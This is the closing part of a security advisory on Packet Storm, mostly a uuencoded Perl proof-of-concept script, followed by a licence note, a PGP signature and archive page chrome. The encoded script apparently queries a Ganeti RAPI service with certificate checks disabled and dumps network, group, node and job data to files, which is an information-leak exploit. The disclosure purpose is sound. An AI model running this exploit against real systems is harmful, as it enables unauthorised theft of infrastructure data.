M82T^>R=I9"=]+6EN9F\M:F]B<R(L(#$L("(R+VEN<W1A;F-E<R\D9&%T82T^
M>R=I9"=]+VEN9F\M:F]B<R(I.PH@('T*?0H*"G-U8B!P87)S95]N971W;W)K
M<R@I"GL*("!M>2`D<F5S(#T@)F=E=%]T87)G970H)&)A<V5?=7)L("X@(CHB
M("X@)&1E9F%U;'1?<F%P:5]P;W)T("X@(B\R+VYE='=O<FMS(BD["@H@(&UY
M("1D96-O9&5D7VIS;VX@/2!*4T]..CID96-O9&5?:G-O;B@D<F5S*3L*"B`@
M)G-A=F5?9&%T85]L96%K*"1R97,L("(R+6YE='=O<FMS(BP@,2D["@H@(&9O
M<F5A8V@@;7D@)&1A=&$@*$![)&1E8V]D961?:G-O;GTI"B`@>PH@("`@)')E
M<R`]("9G971?=&%R9V5T*"1B87-E7W5R;"`N("(Z(B`N("1D969A=6QT7W)A
M<&E?<&]R="`N("1D871A+3Y[)W5R:2=]*3L*("`@("9S879E7V1A=&%?;&5A
M:R@D<F5S+"`B,BUN971W;W)K<RTD9&%T82T^>R=N86UE)WTB+"`Q+"`D9&%T
M82T^>R=U<FDG?2D["B`@?0I]"@H*<W5B('!A<G-E7V=R;W5P<R@I"GL*("!M
M>2`D<F5S(#T@)F=E=%]T87)G970H)&)A<V5?=7)L("X@(CHB("X@)&1E9F%U
M;'1?<F%P:5]P;W)T("X@(B\R+V=R;W5P<R(I.PH*("!M>2`D9&5C;V1E9%]J
M<V]N(#T@2E-/3CHZ9&5C;V1E7VIS;VXH)')E<RD["@H@("9S879E7V1A=&%?
M;&5A:R@D<F5S+"`B,BUG<F]U<',B+"`Q*3L*"B`@9F]R96%C:"!M>2`D9&%T
M82`H0'LD9&5C;V1E9%]J<V]N?2D*("!["B`@("`D<F5S(#T@)F=E=%]T87)G
M970H)&)A<V5?=7)L("X@(CHB("X@)&1E9F%U;'1?<F%P:5]P;W)T("X@)&1A
M=&$M/GLG=7)I)WTI.PH@("`@)G-A=F5?9&%T85]L96%K*"1R97,L("(R+6=R
M;W5P<RTD9&%T82T^>R=N86UE)WTB+"`Q+"`D9&%T82T^>R=U<FDG?2D["B`@
M?0I]"@H*<W5B('!A<G-E7VYO9&5S*"D*>PH@(&UY("1R97,@/2`F9V5T7W1A
M<F=E="@D8F%S95]U<FP@+B`B.B(@+B`D9&5F875L=%]R87!I7W!O<G0@+B`B
M+S(O;F]D97,B*3L*"B`@;7D@)&1E8V]D961?:G-O;B`]($I33TXZ.F1E8V]D
M95]J<V]N*"1R97,I.PH*("`F<V%V95]D871A7VQE86LH)')E<RP@(C(M;F]D
M97,B+"`Q*3L*"B`@9F]R96%C:"!M>2`D9&%T82`H0'LD9&5C;V1E9%]J<V]N
M?2D*("!["B`@("`D<F5S(#T@)F=E=%]T87)G970H)&)A<V5?=7)L("X@(CHB
M("X@)&1E9F%U;'1?<F%P:5]P;W)T("X@)&1A=&$M/GLG=7)I)WTI.PH@("`@
M)G-A=F5?9&%T85]L96%K*"1R97,L("(R+6YO9&5S+21D871A+3Y[)VED)WTB
M+"`Q+"`D9&%T82T^>R=I9"=]*3L*"B`@("`D<F5S(#T@)F=E=%]T87)G970H
M)&)A<V5?=7)L("X@(CHB("X@)&1E9F%U;'1?<F%P:5]P;W)T("X@)&1A=&$M
M/GLG=7)I)WT@+B`B+W)O;&4B*3L*("`@("9S879E7V1A=&%?;&5A:R@D<F5S
M+"`B,BUN;V1E<RTD9&%T82T^>R=I9"=]+7)O;&4B+"`P+"`B;F]D97,O)&1A
M=&$M/GLG:60G?2UR;VQE(BD["B`@?0I]"@H*<W5B('!A<G-E7VIO8G,H*0I[
M"B`@;7D@)'1O=&%L7VIO8G,@/2`P.PH@(&UY("1R97,@/2`F9V5T7W1A<F=E
M="@D8F%S95]U<FP@+B`B.B(@+B`D9&5F875L=%]R87!I7W!O<G0@+B`B+S(O
M:F]B<R(I.PH*("!M>2`D9&5C;V1E9%]J<V]N(#T@2E-/3CHZ9&5C;V1E7VIS
M;VXH)')E<RD["@H@("9S879E7V1A=&%?;&5A:R@D<F5S+"`B,BUJ;V)S(BP@
M,2D["@H@(&9O<F5A8V@@;7D@)&1A=&$@*$![)&1E8V]D961?:G-O;GTI"B`@
M>PH@("`@)'1O=&%L7VIO8G,@/2`D9&%T82T^>R=I9"=](&EF("@D9&%T82T^
M>R=I9"=](#X@)'1O=&%L7VIO8G,I.PH@('T*"B`@9F]R(&UY("1I("@P("XN
M("1T;W1A;%]J;V)S*0H@('L*("`@("1R97,@/2`F9V5T7W1A<F=E="@D8F%S
M95]U<FP@+B`B.B(@+B`D9&5F875L=%]R87!I7W!O<G0@+B`B+S(O:F]B<R\B
M("X@)&DI.PH@("`@)G-A=F5?9&%T85]L96%K*"1R97,L("(R+6IO8G,M)&DB
M+"`Q*3L*("!]"GT*"@IS=6(@<V%V95]D871A7VQE86LH*0I["B`@;7D@)&EN
M<'5T(#T@)%];,%T["B`@;7D@)&]U='!U=%]F:6QE(#T@)%];,5T["B`@;7D@
M)&ES7VIS;VX@/2`D7ULR73L*("!M>2`D<W1D;W5T(#T@)%];,UT@?'P@)&]U
M='!U=%]F:6QE.PH@(&UY("1J<V]N.PH*("!P<FEN="`B4&%R<VEN9R`D<W1D
M;W5T("XN+B!S879I;F<@=&\@)&]U='!U=%]F:6QE7&XB.PH@("1I;G!U="`]
M($1U;7!E<BA*4T]..CID96-O9&5?:G-O;B@D:6YP=70I*2!I9B`H)&E?=V%N
M=%]R96%D86)L95]J<V]N("8F("1I<U]J<V]N*3L*("!O<&5N("A&24Q%+"`B
M/B(L("(D;W5T<'5T7V9I;&4B*3L*("!P<FEN="!&24Q%("@D:6YP=70I.PH@
M(&-L;W-E("A&24Q%*3L*?0H*"G-U8B!G971?=&%R9V5T*"D*>PH@(&UY("1T
M87)G970@/2`D7ULP73L*("!M>2`D97)R;W)?;VL@/2`D7ULQ73L*("!M>2`H
M)'5A+"`D<F5S+"`D<F5Q*3L*"B`@)'5A(#T@3%=0.CI5<V5R06=E;G0M/FYE
M=R@*("`@('-S;%]O<'1S(#T^('L@=F5R:69Y7VAO<W1N86UE(#T^(#`L(%-3
M3%]V97)I9GE?;6]D92`]/B`P('T*("`I.PH@("1U82T^86=E;G0H(D=A;F5T
M:2\R+C$R(BD["B`@)'5A+3YE;G9?<')O>'D["B`@)'5A+3YT:6UE;W5T*#$P
M*3L*("`D<F5Q(#T@;F5W($A45%`Z.E)E<75E<W0@1T54(#T^("1T87)G970[
M"B`@)')E<R`]("1U82T^<F5Q=65S="@D<F5Q*3L*"B`@<')I;G0@(D5R<F]R
M('=H96X@<F5Q=65S=&EN9R`D=&%R9V5T7&XB(&EF("@A)')E<RT^:7-?<W5C
M8V5S<R`F)B`A)&5R<F]R7V]K*3L*"B`@<F5T=7)N("@D<F5S+3YC;VYT96YT
%*3L*?0H`
`
end


## Disclaimer

This advisory is licensed under a Creative Commons Attribution Non-Commercial
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJWioUDAAoJEMQ+Dtp9ky285gQP/0qPK5F05jZPGLCrP1gmCjse
AcV+kT3k6+yUdp2yHSx+sSedxNshJLymFVcKJJooWh3VOSOS6WIBXY9jZuJGT15j
fVFP5GXk55C1IsO2hzRmchJ8uAWplUmMsJkLALCvNps7ImTj4jWvw1qm6w6ArZFC
mm0uEzqojbQTOw1MxfFiffX1RyCjfjRz0SAAQADnx7XI3xrB5FhHVlF2Cey/e5UA
iETLsr+6Ju3RkJ7Q28S959G+YBrKJTC+P60eSSR464O0Nn8d7N7plF50ZrNg1goD
t7xGbMxXXssx/qvHKx1xexGybGrcd5GHC9zlLAYg09c4AoZFT9zaRsRFGSoG6ir6
nSt/x0ryqNb0dhHyWBhQsVGRXThYRQJx4vBLpGbEm2bTUMRyT5xyVvnjgcqykfRN
9oXpjQeKDsh/bTl8vI070VHEzCWNXE0MmDwrf2rXdRmbKWfh2VflIZwmUmVoUt/4
9v6CWHbhlJqWlE4ILuQVHw14prMhGDhRPHqcTMVG+EoRomrUwlcfCcSuJ9vvK2IY
I1Cl4ux065ODL1v30XpyXgY1SevcfqjfM4f+kwXZkpvPQJ5sM2H38kq1ltOsbre5
Vl0srvsRCLPbg9W5QYoF1QkHq6HvqI9XiO5jPofUFjl7DL10b7VqQxpOeJNgj20x
PH33LP+5DdZNpqxxS//B
=7spt
-----END PGP SIGNATURE-----

--
Pierre Kim
pierre.kim.sec@gmail.com
@PierreKimSec
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close